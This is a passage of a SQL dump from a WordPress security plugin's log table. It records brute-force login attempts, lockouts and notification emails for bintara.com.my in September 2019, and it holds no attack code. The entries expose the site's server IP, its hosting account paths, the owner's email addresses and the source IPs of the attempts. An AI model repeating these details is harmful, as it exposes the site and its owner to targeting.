attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:02:52\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:02:52\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:17:52\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:17:52\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:02:54','2019-09-21 11:02:52',17880696,19285536,'https://bintara.com.my/test/wp-login.php',1,0,'188.165.250.134'),(25443,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:02:54','2019-09-21 11:02:52',18086376,19285536,'https://bintara.com.my/test/wp-login.php',1,0,'188.165.250.134'),(25444,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYDXnkXpgmG5P@iB8kQzgAAAJM\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"54.191.160.201\";s:11:\"REMOTE_PORT\";s:5:\"37324\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYDXnkXpgmG5P@iB8kQzgAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063774.4544\";s:12:\"REQUEST_TIME\";s:10:\"1569063774\";}}','notice','2019-09-21 11:02:55','2019-09-21 11:02:54',17796024,19286376,'https://bintara.com.my/blog/wp-login.php',1,0,'54.191.160.201'),(25441,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYDWViJ7D9Gn7wDPh8WDwAAANU\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.165.250.134\";s:11:\"REMOTE_PORT\";s:5:\"57106\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYDWViJ7D9Gn7wDPh8WDwAAANU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063772.5282\";s:12:\"REQUEST_TIME\";s:10:\"1569063772\";}}','notice','2019-09-21 11:02:53','2019-09-21 11:02:52',17795944,19285536,'https://bintara.com.my/test/wp-login.php',1,0,'188.165.250.134'),(25440,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYDOliJ7D9Gn7wDPh8WCgAAANM\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"118.70.239.146\";s:11:\"REMOTE_PORT\";s:5:\"53266\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYDOliJ7D9Gn7wDPh8WCgAAANM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063738.6238\";s:12:\"REQUEST_TIME\";s:10:\"1569063738\";}}','notice','2019-09-21 11:02:20','2019-09-21 11:02:18',18315000,19611816,'https://bintara.com.my/blog/xmlrpc.php',1,0,'118.70.239.146'),(25437,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:02:13\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:02:13\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:17:13\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:17:13\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:02:16','2019-09-21 11:02:13',17966496,19371584,'https://bintara.com.my/wp/wp-login.php',1,0,'40.121.130.23'),(25438,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:02:16','2019-09-21 11:02:13',18171976,19371584,'https://bintara.com.my/wp/wp-login.php',1,0,'40.121.130.23'),(25439,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYDOTDrcQxTmGrCWuaJnwAAAdY\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"40.121.130.23\";s:11:\"REMOTE_PORT\";s:5:\"42742\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYDOTDrcQxTmGrCWuaJnwAAAdY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063737.6617\";s:12:\"REQUEST_TIME\";s:10:\"1569063737\";}}','notice','2019-09-21 11:02:19','2019-09-21 11:02:18',18316192,19612808,'https://bintara.com.my/wp/xmlrpc.php',1,0,'40.121.130.23'),(25436,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYDNbfBTP0kPOVnb8jpkwAAAEk\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"40.121.130.23\";s:11:\"REMOTE_PORT\";s:5:\"41914\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYDNbfBTP0kPOVnb8jpkwAAAEk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063733.5549\";s:12:\"REQUEST_TIME\";s:10:\"1569063733\";}}','notice','2019-09-21 11:02:16','2019-09-21 11:02:13',17881704,19371584,'https://bintara.com.my/wp/wp-login.php',1,0,'40.121.130.23'),(25434,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:02:12\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:02:12\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:17:12\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:17:12\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:02:13','2019-09-21 11:02:12',17884264,19290040,'https://bintara.com.my/blog/wp-login.php',1,0,'14.248.83.23'),(25435,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:02:13','2019-09-21 11:02:12',18090336,19290040,'https://bintara.com.my/blog/wp-login.php',1,0,'14.248.83.23'),(25431,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:01:16\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:01:16\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:16:16\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:16:16\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:01:17','2019-09-21 11:01:16',17883752,19288712,'https://bintara.com.my/2019/wp-login.php',1,0,'212.224.118.117'),(25432,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:01:17','2019-09-21 11:01:16',18089320,19288712,'https://bintara.com.my/2019/wp-login.php',1,0,'212.224.118.117'),(25433,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYDM7fBTP0kPOVnb8jpkgAAAEM\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"14.248.83.23\";s:11:\"REMOTE_PORT\";s:5:\"52030\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYDM7fBTP0kPOVnb8jpkgAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569063731.677\";s:12:\"REQUEST_TIME\";s:10:\"1569063731\";}}','notice','2019-09-21 11:02:13','2019-09-21 11:02:12',17799376,19290040,'https://bintara.com.my/blog/wp-login.php',1,0,'14.248.83.23'),(25155,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-19 21:29:41','2019-09-19 21:29:37',17841960,18304496,'https://bintara.com.my/xmlrpc.php',1,0,'198.71.227.55'),(25154,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 